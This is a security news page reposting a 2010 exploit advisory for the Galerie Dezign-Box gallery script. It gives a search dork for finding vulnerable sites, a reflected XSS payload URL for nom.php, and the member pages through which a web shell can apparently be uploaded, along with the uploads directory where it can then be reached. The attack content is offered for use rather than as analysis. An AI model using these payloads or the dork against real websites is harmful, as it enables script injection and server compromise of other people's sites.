News.Dreamings.Org

is an hourly updated security news portal

Thursday September 9th 2010

Galerie Dezign-Box France Multi Vulnerability

========================================================================================

| # Title : Galerie Dezign-Box © France Multi Vulnerability

| # Author : indoushka

| # email : indoushka@hotmail.com

| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)

| # Web Site : www.iq-ty.com

| # Dork : Script créé par Funewik - Dezign-Box © France

| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)

| # Bug : Multi

====================== Exploit By indoushka =================================

# Exploit :

1- XSS

http://server/galerie/nom.php?id=tufgxab0x2r4xybg527w&nom=<img+src=http://server/dt.gif+onload=alert(213771818860)>

2- Upload Shell

http://server/galerie/membre/register.php (you Can Upload your Evil)

http://server/galerie/membre/membres.php (you Can Upload your Evil)

http://server/galerie/membre/uploads/ (2 find what you upload)

================================ Dz-Ghost Team ========================================

Greetz : ÓíÏí ÈáÚÈÇÓ + Úíä ÇáÈÑÏ + ÔáÛæã ÇáÚíÏ K10 + K@MEL + Úíä ãáíáÉ + ÊÛäíÝ

-------------------------------------------------------------------------------------------

Bookmark It

Add to Del.icio.us

Add to Facebook

Add to Google Bookmarks

Add to Mister Wong

Add to Slashdot

Add to Stumble Upon

Add to Technorati

Add to Yahoo My Web

Post Published: 22 February 2010
Author: Georges Kut
Found in section: Bugtraq

Tags: Dezign-Box, Vulnerability

Previous Topic: VKPlayer 1.0 (.mid) Denial of Service Exploit

Next Topic: cPanel Multiple CSRF Vulnerabilities